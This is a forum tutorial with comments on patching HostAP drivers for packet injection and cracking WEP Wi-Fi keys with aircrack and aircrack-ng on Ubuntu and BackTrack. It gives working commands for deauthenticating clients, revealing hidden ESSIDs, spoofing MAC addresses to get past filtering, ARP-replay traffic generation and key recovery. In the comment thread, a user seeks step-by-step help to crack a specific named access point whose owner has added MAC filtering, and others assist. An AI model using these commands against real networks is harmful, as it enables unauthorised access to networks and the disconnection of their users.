Operating system: Ubuntu 6.06 LTS Dapper Drake (works with Ubuntu 6.10, 7.04, 7.10 too, see link for patching hostap in newer Ubuntu distro), Hardware: WiFi adapters Z-Com XI-626 (Prism 2.5), CM9 (Atheros), Application: Aircrack Pack, Kismet, tcpdump, Driver: HostAP + packet injection patch tutorial. Question and other things in the Forum
Lead-up
Ubuntu repositories contains everithing needed including hostap source but we use the last version of hostap 0.4.9 and 0.4.7 packet injection patch.
Ubuntu installed from DVD uses kernel by proccesor type (in case AMD it uses kernerl k7, in Intel case it uses kernel i386). Packet injection patch doesn't work under k7 kernel! correctly or at all. So we need to install kernel headers and i386 kernel image and boot it up.
Z-com XI-626 adapter (generali in linux) runs under Orinoco module. Get out that module like root do it:
modprobe -r orinoco_pci
modprobe hostap_pci
Add line
blacklist orinoco_pci
into
/etc/modprobe.d/blacklist
Driver
After reboot download the driver and use the patch.
wget http://hostap.epitest.fi/releases/hostap-driver-0.4.9.tar.gz
tar -xvzf hostap-driver-0.4.9.tar.gz
cd hostap-driver-0.4.9
wget http://patches.aircrack-ng.org/hostap-driver-0.4.7.patch
patch -Np1 -i hostap-driver-0.4.7.patch
In path
/home/user/hostap-driver-0.4.9/driver/modules/
search for files:
hostap.c
hostap_cs.c
hostap_plx.c
hostap_pci.c
In one of each file find these five rows and remove them.
#if
(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,14))
#error
Host AP driver was added into Linux 2.6.14.
#error
The version used in the kernel tree should be used instead of this
#error
external release which is only maintained for old kernel versions.
#endif
Let compilation begins. Run:
make
After.., don't use "make install". First yuo should store original contents then clean up
/hostap folder and copy all *.ko files from
/hostap-driver-0.4.9/driver/modules/
into
/lib/modules/2.6.....-386/kernel/drivers/net/wireless/hostap/
Find & Copy hostap_en.conf from
/hostap-driver-0.4.9/driver/etc/
into
/etc/pcmcia/
Reboot. After reboot run these commands:
depmod -a
ifconfig wlan0 down
ifconfig wlan0 up
Check.
dmesg | grep hostap
Firmware
Z-Com with firmware newer than 1.7.4 is in the system registred as ethX. This version of firmware is recommended. Otherwise try to flash you adapter. Check your version of firmware with
hostap_diag -p wlan0
'll see something like that:
Host AP driver diagnostics information for 'wlan0'
NICID:
id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash)
PRIID:
id=0x0015 v1.1.1
STAID:
id=0x001f v1.7.4 (station firmware)
Channel no. 14
To get running 14. channel on Z-Com adapter we need edit PDA (Production Data Area). Don't change localization. Just change
1fff to 3fff
on line 0x0104.
Testing functionality
Packet injection is nothing more than time reduction. Cracking of WEP is possible without packet injection but it can take tens of hours or few days.
Aircrack pack contains these parts:
aircrack, airodump, airmon, aireplay, airdecap
Aircrack-ng pack contains these parts:
aircrack-ng, airodump-ng, airmon-ng, aireplay-ng, packetforge-ng, airtun-ng, airserv-ng
We uses packet injection in Aireplay. Before we start to laborate we should check if packet injection works.
Option 1: Switch adapter to monitor mode. Iwconfig contains wireless
tools, airmon pack aircrack.
iwconfig wlan0 mode monitor
or
airmon start wlan0
for Aircrack-ng
airmon-ng start wlan0
Now run Ethereal or Wireshark with realtime traffic showing on wlan0 adapter.
For showing only deauth packets use filter
wlan.fc.type_subtype 12
Run in shell
aireplay -0 5 -a 01:02:03:04:05:06 wlan0
for Aircrack-ng:
aireplay-ng -0 5 -a 01:02:03:04:05:06 wlan0
In Ethereal window you see five deauth packets with MAC address 01:02:03:04:05:06
Option II -> Test with AP with hidden ESSID. When client deauth doesn't work on encrypted network even if you know its MAC you have bad luck.
Monitor mode, detection
About WEP (Wired Equivalent Privacy) weaknesses was written hundreds pages of text and new theories like Chopchop are comming out. So if you want to know more about it go and search.
Switch adapter to monitor mode
airmon start wlan0
cmd for Aircrack-ng:
airmon-ng start wlan0
Run Airdodump that until stopped (ctr+c) scans available networks. "3"
is number of channel. "out" is log file. "1" after the number channel means that only WEP packets will be logged. (Name of the log file and channel number is optional)
airodump wlan0 out 3 1
cmd for Aircrack-ng:
airodump-ng --ivs -w out --ch 3 wlan0
for Aircrack-ng with particular MAC in case that quantum of APs are
around..
airodump-ng --bssid 00:60:Bx:xx:xx:xx --ivs -w out --ch 3 wlan0
Aircrack comment: Without ininitation of file format "1" (means "ivs") is possible to store into pcap. First we notice is strength of signal. Too big or small distance is problem. In first case (saturation) there is no must to have the signal even if you have AP next on your desk.
Viewed PWR are authentic. Value lower than 163 means no-hope. Optimal
PWR value is between 167 and 195. Locating the best direction by the
move of the antenna and watching PWR coast minimum of time. Finding out the polarization is metter of rotating antenna 90°. To gain transfer use power regulation (standard on Z-Com is 198):
iwpriv wlan0 writemif 62 130
This leads to less packet loss:
wconfig wlan0 rate 1M
Sensitivity control:
iwconfig wlan0 sens 3 [1, 2, 3]
Deauth, Packet injection, Hidden essid
Detected AP have a good singnal with connected clients and doesn't provide ESSID.
Use Aireplay -0. Number 5 means count of deauth packets that we send.
"-0" is the first of five mods in Aireplay.
Deauth to broadcast
aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0
Deauth client with MAC.
aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
Deauth to broadcast with MAC of source
aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx wlan0
Deauth to client with MAC of source
aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
cmd for Aireplay-ng:
aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
Deauth "disconnect" the client connected to AP and Airodump in the first shell records reconnect of that client containing ESSID. Now we have name of the AP.
PenTest: Association
To begin the communication with AP it is necessary at first to nock on the door :-) that means to associate. In case that on the AP is the MAC restriction set up it is necessary to know at least one valid MAC address. Exactly for this serves the projection of connected clients. When Airodump does not detect any clients it means: bad signal, bad timing :-), ad-hoc network, or it is a data AP. On this data AP nobody usualy connects and it serves only as a data line (used for example by UPC), repeater, [bridge]
aireplay -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0
Aireplay-ng cmd:
aireplay-ng -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx ath0
In case of a sufficient signal, knowledge of essid [AP name] and allowed (in the case of mac restriction) MAC address the association works on 99%.
ARP, trafic generation
After the association run the packet injection by the Aireplay -3 [ARP-request reply] Replayig multiples the traffic, number of WEP packets, even the number of initializing vectors :-)
aireplay -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0
Aireplay-ng:
aireplay-ng -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0
-x 600 stands for number of packets in a second. Number of ARP request
-u stops on number 1024.
In the first panel see the progress.
The time in which Airodump gathers enough of packets [for 64bit code 80 to 300 000, for128bit coding 300 000 to 1 000 000 packets] depends on the speed of the line – quality of the signal as mentioned above. Duration of packet gathering is 10 minutes to one hour. [+ , -] Ideal is to associate on the same mac address as the client who himself generates traffic [for example downloading on p2p ]. In this case after packet injection start up 300 000 ivs happends in few minutes. Aireplay as well as Airodump and Aircrack can be stoped and restarted without influencing the result.
Continue at text Korek, Kismet and Gateway
Hack wep Access Point have MAC filtering
Edit:
This is discussion NO HelpDesk. Do not ask for help here. For consulting come to the IRC channel or ask in the Forum topic. Thx.
re: Crack AP with MAC filtering
Hi. It's work with attack aireplay-ng 4 or 5 (korek's chopchop, fragmentation). Association need only attcak 2 and 3. Hidden ESSID it is possible uncover with tools like MDK or SKA. I think USB deivices back compat. USB 2 works with USB 1 with no problem.
how to config USB 2.0 to USB 1.1 on BackTracK
thanx for your answer arestes. but i can't try aireplay-ng 4 or 5 attack because my MB K7N2 Delta-L ILSR is damage (it's support USB 1.1 if i change in BIOS setup) that make my rt73 work in my long USB cable (11 meter from my roof) with Backtrack. Exmpl for MB P4M800pro (in windows) that can be set USB 1.1 if i disable USB enhanced host controller, but i don't know how to configure USB 2.0 to USB 1.1 in Backtrack. Is there any solution so i can make airodump-ng + aireplay-ng + aircrack-ng with USB 1.1 on Backtrack?
re: serialmonkey and enhanced usb controler
It's recommended to put off ehnhanced usb conntroller for using packet injection with some versions of serialmonkey driver
Tools for uncover + get connection to hidden ESSID in Windows XP
Ou ya arestes.. Are tools like MDK or SKA work on windows XP too? Can you mention + where i can download tools to uncover Hidden ESSID and get connection to Hidden ESSID on Windows XP with ralink rt73.. Thanks for your help
re: hidden ESSID
Windows is operating system for painting pictures and playing games :)
WEP crack - Access Point no client, no MAC restriction
Thanx for the comments, but now i desperate to try with attack aireplay-ng 4 or 5 (korek's chopchop, fragmentation) and attack 2 and 3. It's not respon and reject by Access Point, I think DARKIPUNK03 not allowed all client mac to connect but i'm not sure? Can u help n tell me anything else command one by one to crack this AP with no one client allowed to connect? If i use Kismet to get information DARKIPUNK03 AP its always constrainted by Suspicious client (probing networks but never participating) I used Backtrack 3 and notexpert. Thx for help. Screenshot
re: Darkipunk WEP crack
Hi Darkipunk. One more detail.. are you inject with right driver? After removing USB wireless device
modprobe rt73
Input device, activate interface and start mode monitor
ifconfig rausb0 up
iwconfig rausb0 mode monitor or iwpriv rausb0 rfmontx 1
To detect and display signal strenght (with loaded serialmonkey driver)
iwpriv rausb0 forceprism 1
Do you..?
crack DarkIpunK03 AP
Yes n3tQ. i think, i have activate monitor mode, so i can start airodump-ng,kismet.
ifconfig rausb0 up
airmon-ng start rausb0
=========================================
before, WEP key DARKIPUNK03 can be found with simple crack:
airodump-ng --channel 6 --write output --ivs rausb0
aireplay-ng --fakeauth 30 -e DARKIPUNK03 -a 00:02:6F:XX:XX:XX -h 00:C0:A8:XX:XX:XX rausb0
aireplay-ng --arpreplay -b 00:02:6F:XX:XX:XX -h 00:C0:A8:XX:XX:XX -x 512 rausb0
aircrack-ng -b 00:02:6F:XX:XX:XX output-01.ivs
screenshot
i think that WEP key can be found because i get the MAC station/clients (00:C0:A8:XX:XX:XX).but now WEP key of DARKIPUNK03 AP have change, have MAC filter, and have hidden MAC STATION/clients, but the BSSID still probing, I still confused to crack DARKIPUNK03 AP???
=======================================
I have try to fake all MAC in air near the AP, it always got reject,error:
03:43:45 Sending Authentication Request (Open System)
03:43:45 AP rejects the source MAC address (XX:XX:XX:XX:XX:XX) ?
Authentication failed (code 1)
03:54:17 Sending Authentication Request (Open System)
03:54:17 Authentication failed (code 14)
Saving chosen packet in replay_src-0402-044330.cap
04:49:44 Data packet found!
04:49:44 Sending fragmented packet
04:49:46 No answer, repeating...
04:49:46 Trying a LLC NULL packet
04:49:46 Sending fragmented packet
04:49:59 No answer, repeating...
04:50:01 Sending fragmented packet
04:50:01 Got a deauthentication packet!
04:50:06 No answer, repeating...
04:50:06 Still nothing, trying another packet...
========================================
What forceprism 1 used for, its my forceprism activate?how to activate forceprism?
========================================
I load with default driver from backtrack 3 LiveCD,rt73 its from serialmonkey too,i don't know how to install from http://rt2x00.serialmonkey.com/rt73-cvs-daily.tar.gz .i have extract to /root n try
$ cd ./rt73-cvs-YYYYMMDDHH/Module
$ make
n its always unsuccess n have error, how to install rt73-cvs-daily driver?
modprobe rt73
Where is the answer to my question.. did you modprobe rt73 ???
How to load module for Linksys USB WiFi
I don't know how to look of respon modprobe rt73 is ok,can u tell me? I have try: (sorry for the text because i don't know to orderly)
bt ~ # lsusb
Bus 4 Device 2: ID 13b1:0020 Linksys WUSB54GC 802.11g Adapter [ralink rt73]
Bus 4 Device 1: ID 0000:0000
Bus 2 Device 1: ID 0000:0000
Bus 1 Device 2: ID 062a:0000 Creative Labs
Bus 1 Device 1: ID 0000:0000
Bus 3 Device 1: ID 0000:0000
bt ~ # modprobe rt73
bt ~ # ifconfig rausb0 up
bt ~ # iwconfig rausb0 mode monitor
bt ~ # iwpriv rausb0 rfmontx 1
bt ~ # iwpriv rausb0 forceprism 1
bt ~ # iwpriv rausb0
rausb0 Available private ioctls :
set (8BE2) : set 1024 char & get 0
bbp (8BE3) : set 1024 char & get 1024 char
mac (8BE5) : set 1024 char & get 1024 char
adhocOfdm (8BE6) : set 1 int & get 0
stat (8BE9) : set 1024 char & get 1024 char
get_site_survey (8BED) : set 1024 char & get 1024 char
get_RaAP_Cfg (8BEF) : set 1024 char & get 0
forceprism (8BF0) : set 1024 char & get 0
rfmontx (8BEC) : set 1024 char & get 1 char
auth (8BE7) : set 1 int & get 0
enc (8BE8) : set 1 int & get 0
wpapsk (8BEA) : set 64 char & get 0
psm (8BEB) : set 1 int & get 0
bt ~ # modinfo rt73
filename: /lib/modules/2.6.21.5/extra/rt73.ko
license: GPL
description: Ralink RT73 802.11abg WLAN Driver k2wrlz modifications 2.0.0
author: http://rt2x00.serialmonkey.com
alias: usb:v13B1p0023d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p90ACd*dc*dsc*dp*ic*isc*ip*
alias: usb:v1690p0722d*dc*dsc*dp*ic*isc*ip*
alias: usb:v06F8pE010d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p9712d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6196d*dc*dsc*dp*ic*isc*ip*
alias: usb:v13B1p0020d*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp705Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp7050d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07D1p3C04d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07D1p3C03d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1044p800Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v1631pC019d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9032d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9022d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1472p0009d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0769p31F3d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07B8pB21Dd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0pA861d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0pA874d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0p6877d*dc*dsc*dp*ic*isc*ip*
alias: usb:v14B2p3C22d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1044p8008d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6229d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6196d*dc*dsc*dp*ic*isc*ip*
alias: usb:v148Fp2671d*dc*dsc*dp*ic*isc*ip*
alias: usb:v148Fp2573d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0B05p1723d*dc*dsc*dp*ic*isc*ip*
depends:
vermagic: 2.6.21.5 SMP mod_unload 486
parm: debug:Enable debug, accepted values: 0 (no debug, default), 1 (Trace), 2 (Info). (int)
I got problem if i want to install rt73 driver from serialmonkey, i try like this:
bt ~ # cd rt73-cvs-2008040114
bt rt73-cvs-2008040114 # cd Module/
bt Module # make
make: *** /lib/modules/2.6.21.5/build: No such file or directory. Stop.
rt73.ko failed to build!
make: *** [module] Error 1
bt Module # makefile
-bash: makefile: command not found
bt Module # dir
CVS/ connect.c oid.h rtmp.h rtmp_type.h sync.c
Makefile iwpriv_usage.txt rt2x00debug.c rtmp_def.h rtmp_wep.c wpa.c
TESTING md5.c rt2x00debug.h rtmp_info.c rtusb_bulk.c wpa.h
assoc.c md5.h rt73.bin rtmp_init.c rtusb_data.c
auth.c mlme.c rt73.h rtmp_main.c rtusb_io.c
auth_rsp.c mlme.h rt_config.h rtmp_tkip.c sanity.c
please help me n3tQ..
re: modprobe rt73 to darkipunk
Hi man, this is never ending story.. I think 'll be better (and quick) you come into our IRC channel to pow wow about modprobe rt73.
dictionary phrase
But does this require that the passphrase be a dictionary phrase, or a combo of words found in the dictionary?
Deauth/disassoc packet
Thanx for help me in IRC channel, but now I can't find airdump.net channel. I "got a deauth/disassoc packet. Is the source MAC associated?". Can i resolve this distracter, it's the deauth from the Suspicious client?
re: Deauth
I think can'nt understand your question.
sorry with my english n3tQ
sorry with my english n3tQ :) is there any app for find valid Authentication clients on AP, because i always got a deauth/disassoc packet when i running all attack mode with fake mac clients which show in kismet (because i can't see clients of AP on airodump-ng)if i have catch 1 ARP i always got a deauth/disassoc, can i resolve it?
some with attack say;
Saving chosen packet in replay_src-0418-113957.cap
11:40:02 Data packet found!
11:40:02 Sending fragmented packet
11:40:02 Got a deauthentication packet!
---
07:19:34 AP rejects the source MAC address (00:02:6F:XX:XX:XX) ?
Authentication failed (code 1)
---
11:33:31.416337 Retry 213us BSSID:00:02:6f:XX:XX:XX DA:00:02:6f:XX:XX:XX SA:00:0
2:6f:XX:XX:XX DeAuthentication: Class 2 frame received from nonauthenticated sta
tion
n3tQ why if i runing airoscript 6,7,8,9,10 always fail it not show respon from aireplay-ng?
6) Chopchop attack
7) Chopchop attack using a client
8) Solo interactive attack (attempt to jump start stalled injections)
9) Chopchop attack injection part of the attack
10) Chopchop attack using a client injection part of the attack